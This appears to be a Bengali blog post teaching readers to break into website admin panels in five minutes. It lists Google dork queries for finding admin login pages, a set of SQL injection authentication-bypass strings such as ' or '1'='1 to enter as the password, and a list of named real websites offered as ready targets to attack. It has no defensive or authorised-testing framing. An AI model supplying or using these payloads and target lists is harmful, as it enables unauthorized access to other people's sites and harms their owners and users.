১০:৫২ PM
sobuj
আজ দেখাব মাত্র ৫ মিনিটে কিভাবে
একটি ওয়েবসাইট হ্যাক করতে হয়। আমার মনে হয় আপনি এই নিয়মটা শিখার জন্য অনেক আগ্রহী হয়ে বসে আছে।আসুন শিখে ফেলি কিভাবে ৫ মিনিটে একটা
ওয়েবসাইট হ্যাকিং করতে হয়।
গুগল এ খুজলে আপনি হাজার হাজার vulnerable সাইট পাবেন ।
হ্যাকিং নিয়ে আরও অনেক কথা হবে ।
এই কাজটি আমরা authentication bypass পদ্ধতিতে এডমিন আইডি হ্যাকিং করব। হ্যাকিং শুরু করুন।
- প্রথমে আমরা যাব www.google.com এ।
- এবার Search বক্সে নিচের যে কোন একটি Google dork/sql injection লিখুন।
- আপনাদের সুবিধার্থে আমি sql injection কিছু দিয়ে দিলাম নিচে।
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl: admin.php"
"inurl: login/admin.php"
"inurl: admin/login.php"
"inurl: adminlogin.php"
"inurl: adminhome.php"
"inurl: admin_login.php"
"inurl: administratorlogin.php"
"inurl: login/administrator.php"
"inurl: administrator_login.php"
- এবার সার্চ দিন। তাহলে অনেক গুলো ফলাফল পাবেন।
- যে কোন একটি সাইটে প্রবেশ করুন। তাহলে সাইটটি আপনাকে নিচের মতো কিছু দেখাবে…
welcome to xxxxxxxxxx administrator panel
username :
password :
- এখানে ইউজার নেম দিনঃ Admin
- তাহলে পাসওয়ার্ড কি দিবেন ? নিচের থেকে যে কোন একটি দিন ।
- নিচে কিছু sql injections দিলাম। এখান থেকে যে কোন একটি দিনঃ
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
- তাহলে আপনার লগইন স্ক্রীণ হবে এই রকম…
username:Admin
password:'or'1'='1
- এবার submit এ ক্লিক করুন।
- ব্যস কাজ শেষ আপনি এখন ঐ সাইট এর এডমিন ।
মনে রাখবেন, প্রত্যেকটি সাইট vulnerable নয়। যে সব সাইট vulnerable সেগুলোতে কাজ করবে।
নিচে কিছু vulnerable সাইট দিলাম যাতে কষ্ট করে আপনাকে গুগল এ খুজতে না হয় । তাহলে নিচের সাইট গুলা আগে হ্যাক করুনঃ
www.sunmarytrust.org/adminlogin.asp
www.arcvns.com/admin.asp
www.amskrupajal.org/AdminLogin.asp
www.quickwrench.com/Admin/adminlogin.asp
www.adyar.net/Adminlogin.asp
www.ringjordan.com/AdminLogin.asp
www.preventivecardiology.in/adminlogin.asp
www.udesa.co.za/admin/login.asp
www.railgourmet.com/admin/admin-login.asp
www.arcvns.com/admin.asp
www.amskrupajal.org/AdminLogin.asp
www.quickwrench.com/Admin/adminlogin.asp
www.adyar.net/Adminlogin.asp
www.ringjordan.com/AdminLogin.asp
www.preventivecardiology.in/adminlogin.asp
www.udesa.co.za/admin/login.asp
www.railgourmet.com/admin/admin-login.asp
গুগল এ খুজলে আপনি হাজার হাজার vulnerable সাইট পাবেন ।
হ্যাকিং নিয়ে আরও অনেক কথা হবে ।
0 মন্তব্য(গুলি):
একটি মন্তব্য পোস্ট করুন